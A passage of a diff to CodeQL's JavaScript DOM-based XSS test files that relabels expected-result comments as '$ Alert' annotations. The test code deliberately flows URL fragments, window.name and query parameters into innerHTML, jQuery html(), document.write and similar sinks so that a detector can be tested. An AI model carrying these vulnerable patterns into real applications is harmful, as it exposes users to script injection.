${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { let taint = decodeURIComponent(window.location.hash.substring(1)); const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..1d43afdefa91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -12,7 +12,7 @@ function drop(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('drop', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js @@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

    A link

    '; // NOT OK + this.parentNode.innerHTML = '

    A link

    '; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..f81f545809fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -2,37 +2,37 @@ function test() { var tainted = document.location.search $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
    "); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
    "); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert let hash = window.location.hash; $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..f9958ea20999 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..74c96fdae902 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -7,7 +7,6 @@ app.get('/some/path', function (req, res) { var taint = req.param("wobble"); jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..dcec3e388777 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,24 +1,24 @@ function test() { var target = document.location.search - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } @@ -29,18 +29,18 @@ function badSanitizer() { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..b60ca27e0e47 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -7,13 +7,13 @@ export default function Post(params) { return ( <>
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..2e403f76ddae 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -5,6 +5,6 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
    ) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..7bf77b18be10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -2,25 +2,25 @@ import { useState } from 'react'; function initialState() { let [state, setState] = useState(window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); setState(window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(() => window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) setState(() => window.name); } @@ -29,5 +29,5 @@ function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
    ; // OK + return
    ; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..3ece85044bb3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -15,35 +15,35 @@ function escapeAttr(s) { function test() { var tainted = window.name; var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..6ee44babf8bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -2,29 +2,29 @@ sessionStorage.setItem('session', document.location.search); localStorage.setItem('local', document.location.search); - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js @@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); // OK - for now +document.write(escape(escape(escape(document.location.href)))); // OK - for now diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..a823a6ce004f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -2,9 +2,9 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..e1d26b45802d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -5,17 +5,17 @@ import ReactTooltip from 'react-tooltip'; function tooltips() { const source = window.name; return - // OK - // OK - // NOT OK - // NOT OK + + + // $ Alert + // $ Alert } function MyElement(props) { const provide = props.provide; - return
    ; // NOT OK + return
    ; // $ Alert } function useMyElement() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..d57844a89f28 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -5,8 +5,7 @@ }; var target = document.location.search var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..34eae2dc6a5b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,12 +1,12 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert policy1.createHTML(window.name); -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..760edfa9ec8a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,144 +1,128 @@ function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
    '); + $('
    '); // $ Alert - $('
    '); // OK - $('
    '); // OK + $('
    '); + $('
    '); let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } foo(document.location.search); function bar() { return document.location.search; } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
    " + s + "
    "; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } dangerouslySetInnerHtml(document.location.search); dangerouslySetInnerHtml(document.location.search); -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert [,document.location.search].forEach(function(x) { if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
    ').html(document.location.search); // NOT OK - angular.element('
    ').html('SAFE'); // OK + angular.element('
    ').html(document.location.search); // $ Alert + angular.element('
    ').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { var v = document.location.search.substr(1); - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } @@ -148,11 +132,11 @@ function angularJSServices() { xssSinkService1(window.location.search); }]) .factory("xssSinkService1", function(){ - return function(v){ $("
    ").html(v); } // NOT OK + return function(v){ $("
    ").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
    ").html(xssSourceService()); // NOT OK + $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ return function() { return window.location.search }; @@ -162,11 +146,11 @@ function angularJSServices() { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
    ").html(v); } // OK + return function(v){ $("
    ").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
    ").html(innocentSourceService()); // OK + $("
    ").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -177,27 +161,27 @@ function testDOMParser() { var target = document.location.search var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { var tainted = document.location.search; - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ var tainted = document.location.search; - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { @@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ 